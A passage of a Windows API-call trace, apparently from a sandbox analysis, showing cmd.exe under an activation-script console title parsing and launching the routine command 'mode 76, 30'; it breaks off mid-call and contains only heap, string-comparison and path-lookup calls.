returned 1 [0180.265] GetProcessHeap () returned 0x19a8f1e0000 [0180.266] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0180.266] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.266] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23e7 [0180.266] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.267] SetFilePointer (in: hFile=0x9c, lDistanceToMove=9204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23f4 [0180.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="mode 76, 30\r\noft_Activation_Scripts %masver%\r\n============================================================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 13 [0180.267] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.267] GetFileType (hFile=0x9c) returned 0x1 [0180.267] _get_osfhandle (_FileHandle=3) returned 0x9c [0180.267] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23f4 [0180.267] GetProcessHeap () returned 0x19a8f1e0000 [0180.267] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.268] GetProcessHeap () returned 0x19a8f1e0000 [0180.269] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.272] _wcsicmp (_String1="mode", _String2=")") returned 68 [0180.272] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0180.272] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0180.272] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0180.272] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0180.272] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0180.272] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0180.272] GetProcessHeap () returned 0x19a8f1e0000 [0180.273] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0180.273] GetProcessHeap () returned 0x19a8f1e0000 [0180.273] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0180.273] GetProcessHeap () returned 0x19a8f1e0000 [0180.273] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0180.273] _tell (_FileHandle=3) returned 9204 [0180.273] _close (_FileHandle=3) returned 0 [0180.273] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0180.273] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0180.273] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0180.273] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0180.273] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0180.273] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0180.273] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0180.273] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0180.274] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0180.274] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0180.274] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0180.274] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0180.274] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0180.274] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0180.274] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0180.274] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0180.274] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0180.274] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0180.274] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0180.274] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0180.274] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0180.274] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0180.274] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0180.274] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0180.274] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0180.274] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0180.274] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0180.274] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0180.274] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0180.274] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0180.274] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0180.275] _wcsicmp (_String1="mode", _String2="START") returned -6 [0180.275] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0180.275] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0180.275] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0180.275] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0180.275] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0180.275] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0180.275] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0180.275] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0180.275] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0180.275] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0180.275] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0180.275] GetProcessHeap () returned 0x19a8f1e0000 [0180.275] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200de0 [0180.275] SetErrorMode (uMode=0x0) returned 0x0 [0180.275] SetErrorMode (uMode=0x1) returned 0x0 [0180.275] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200df0, lpFilePart=0x43f9efec80 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efec80*="System32") returned 0x13 [0180.276] SetErrorMode (uMode=0x0) returned 0x1 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x42) returned 0x19a8f200de0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x42 [0180.276] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0180.276] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1faef0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0180.276] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0180.276] GetProcessHeap () returned 0x19a8f1e0000 [0180.276] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0180.277] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\mode.*" (normalized: "c:\\windows\\system32\\mode.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efea00) returned 0x19a8f1f8ca0 [0180.277] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0180.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\mode.COM" (normalized: "c:\\windows\\system32\\mode.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efea00) returned 0x19a8f1f8be0 [0180.277] FindClose (in: hFindFile=0x19a8f1f8be0 | out: hFindFile=0x19a8f1f8be0) returned 1 [0180.277] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0180.278] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0180.278] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.280] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0180.280] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0180.280] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0180.280] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0180.280] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0180.280] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0180.280] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0180.280] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0180.280] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0180.280] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0180.280] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0180.280] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0180.280] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0180.280] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0180.280] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0180.280] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0180.280] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0180.280] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0180.280] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0180.280] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0180.280] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0180.280] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0180.280] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0180.281] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0180.281] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0180.281] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0180.281] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0180.281] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0180.281] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0180.281] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0180.281] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0180.281] _wcsicmp (_String1="mode", _String2="START") returned -6 [0180.281] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0180.281] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0180.281] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0180.281] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0180.281] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0180.281] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0180.281] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0180.281] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0180.281] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0180.281] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0180.281] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0180.281] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0180.281] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0180.281] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0180.281] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0180.281] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0180.281] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0180.282] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0180.282] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0180.282] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0180.282] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0180.282] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0180.282] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0180.282] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0180.282] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0180.282] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0180.282] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0180.282] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0180.282] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0180.282] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0180.282] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0180.282] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0180.282] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0180.282] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0180.282] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0180.282] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0180.282] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0180.282] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0180.282] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0180.282] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0180.282] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0180.282] _wcsicmp (_String1="mode", _String2="START") returned -6 [0180.282] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0180.283] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0180.283] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0180.283] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0180.283] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0180.283] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0180.283] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0180.283] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0180.283] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0180.283] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0180.283] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0180.283] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0180.283] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0180.283] GetProcessHeap () returned 0x19a8f1e0000 [0180.283] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20c8d0 [0180.283] GetProcessHeap () returned 0x19a8f1e0000 [0180.283] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0a70 [0180.283] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0180.283] GetProcessHeap () returned 0x19a8f1e0000 [0180.283] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200e40 [0180.283] SetErrorMode (uMode=0x0) returned 0x0 [0180.283] SetErrorMode (uMode=0x1) returned 0x0 [0180.284] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200e50, lpFilePart=0x43f9efe4f0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe4f0*="System32") returned 0x13 [0180.284] SetErrorMode (uMode=0x0) returned 0x1 [0180.284] GetProcessHeap () returned 0x19a8f1e0000 [0180.284] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200e40, Size=0x42) returned 0x19a8f200e40 [0180.284] GetProcessHeap () returned 0x19a8f1e0000 [0180.284] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200e40) returned 0x42 [0180.284] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0180.285] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fbef0 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f9f80 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0xf0) returned 0x19a8f1f9f80 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0xf0 [0180.285] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1fa080 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fa080, Size=0x88) returned 0x19a8f1fa080 [0180.285] GetProcessHeap () returned 0x19a8f1e0000 [0180.285] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fa080) returned 0x88 [0180.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.285] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\mode.*" (normalized: "c:\\windows\\system32\\mode.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8b80 [0180.286] FindClose (in: hFindFile=0x19a8f1f8b80 | out: hFindFile=0x19a8f1f8b80) returned 1 [0180.286] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\mode.COM" (normalized: "c:\\windows\\system32\\mode.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8a60 [0180.286] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0180.286] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0180.286] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0180.286] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.287] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe6f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe5f0 | out: lpAttributeList=0x43f9efe6f0, lpSize=0x43f9efe5f0) returned 1 [0180.287] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe6f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe5dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe6f0, lpPreviousValue=0x0) returned 1 [0180.287] GetStartupInfoW (in: lpStartupInfo=0x43f9efe680 | out: lpStartupInfo=0x43f9efe680*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0180.288] GetProcessHeap () returned 0x19a8f1e0000 [0180.288] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb8f0 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0180.288] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.289] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_deskto", _MaxCount=0x7) returned 4 [0180.290] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0180.291] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0180.291] GetProcessHeap () returned 0x19a8f1e0000 [0180.291] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.292] GetProcessHeap () returned 0x19a8f1e0000 [0180.292] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ec6c0 [0180.292] lstrcmpW (lpString1="\\mode.com", lpString2="\\XCOPY.EXE") returned -1 [0180.292] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\mode.com", lpCommandLine="mode 76, 30", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 